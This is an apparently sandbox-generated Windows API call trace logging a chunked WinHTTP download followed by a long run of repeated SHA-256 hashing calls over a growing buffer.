	[0196.495] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2683f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2683f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.495] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.495] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xf7f00) returned 0x2c90020
	[0196.511] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d85f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d85f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.511] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.511] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xf9f00) returned 0x2590020
	[0196.535] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2687f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2687f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.535] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.535] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xfbf00) returned 0x2c90020
	[0196.598] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d89f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d89f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.598] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.639] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xfdf00) returned 0x2590020
	[0196.654] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x268bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x268bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.654] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.655] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xfff00) returned 0x2c90020
	[0196.672] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d8df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d8df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.672] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.683] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0x101f00) returned 0x2d90020
	[0196.699] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2e8ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2e8ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.700] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.700] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2d90020, Size=0x103f00) returned 0x2ea0020
	[0196.716] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2fa1f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2fa1f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.716] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.717] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2ea0020, Size=0x105f00) returned 0x2c90020
	[0196.734] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d93f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d93f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.734] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.734] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0x107f00) returned 0x2da0020
	[0196.751] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2ea5f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2ea5f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.751] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.752] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2da0020, Size=0x109f00) returned 0x2c90020
	[0196.769] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d97f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d97f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.769] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.769] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0x10bf00) returned 0x2da0020
	[0196.786] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2ea9f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2ea9f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.786] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.826] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2da0020, Size=0x10df00) returned 0x2c90020
	[0196.842] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d9bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d9bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.842] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.888] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0x10ff00) returned 0x2da0020
	[0196.905] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2eadf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2eadf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.906] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x1463) returned 1
	[0196.911] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2da0020, Size=0x111360) returned 0x2eb0020
	[0196.930] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2fbff1d, dwNumberOfBytesToRead=0x1463, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2fbff1d*, lpdwNumberOfBytesRead=0x12822c*=0x1463) returned 1
	[0196.930] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x0) returned 1
	[0196.944] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac218
	[0196.944] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2754be0
	[0196.944] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.944] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.944] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0196.944] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230af68
	[0196.945] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230af68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230af68, pdwDataLen=0x128aac) returned 1
	[0196.945] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.945] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.945] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.945] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.945] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0196.945] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230afb8
	[0196.945] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230afb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230afb8, pdwDataLen=0x128aac) returned 1
	[0196.945] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.945] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.945] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.945] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.945] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0196.945] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230afe0
	[0196.946] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230afe0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230afe0, pdwDataLen=0x128aac) returned 1
	[0196.946] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.946] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.946] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.946] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.946] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0196.946] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b008
	[0196.946] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b008, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b008, pdwDataLen=0x128aac) returned 1
	[0196.946] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.946] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.946] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.946] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.946] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0196.946] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b030
	[0196.947] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b030, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b030, pdwDataLen=0x128aac) returned 1
	[0196.947] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.947] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.947] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.947] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.947] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0196.947] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b058
	[0196.947] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b058, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b058, pdwDataLen=0x128aac) returned 1
	[0196.947] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.947] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.947] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.947] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.947] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0196.947] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.947] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b080
	[0196.947] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b080, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b080, pdwDataLen=0x128aac) returned 1
	[0196.948] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.948] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.948] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.948] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.948] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0196.948] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b0a8
	[0196.948] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b0a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b0a8, pdwDataLen=0x128aac) returned 1
	[0196.948] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.948] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.948] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.948] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.948] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0196.948] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.948] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b0d0
	[0196.948] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b0d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b0d0, pdwDataLen=0x128aac) returned 1
	[0196.948] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.948] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.949] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.949] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.949] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0196.949] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b0f8
	[0196.949] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b0f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b0f8, pdwDataLen=0x128aac) returned 1
	[0196.949] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.949] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.949] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.949] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.949] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0196.949] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b120
	[0196.949] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b120, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b120, pdwDataLen=0x128aac) returned 1
	[0196.949] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.949] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.950] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.950] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.950] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0196.950] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.950] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b148
	[0196.950] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b148, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b148, pdwDataLen=0x128aac) returned 1
	[0196.950] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.950] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.950] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.950] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.950] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0196.950] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b170
	[0196.951] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b170, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b170, pdwDataLen=0x128aac) returned 1
	[0196.951] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.951] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.951] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.951] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.951] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0196.951] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b198
	[0196.951] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b198, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b198, pdwDataLen=0x128aac) returned 1
	[0196.951] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.951] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.951] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.951] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.951] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0196.951] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.951] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b1c0
	[0196.952] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b1c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b1c0, pdwDataLen=0x128aac) returned 1
	[0196.952] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.952] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.952] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.952] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.952] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0196.952] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b1e8
	[0196.952] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b1e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b1e8, pdwDataLen=0x128aac) returned 1
	[0196.952] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.952] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.952] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.952] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.952] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0196.952] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.952] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b210
	[0196.952] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b210, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b210, pdwDataLen=0x128aac) returned 1
	[0196.953] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.953] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.953] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.953] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.953] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0196.953] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b238
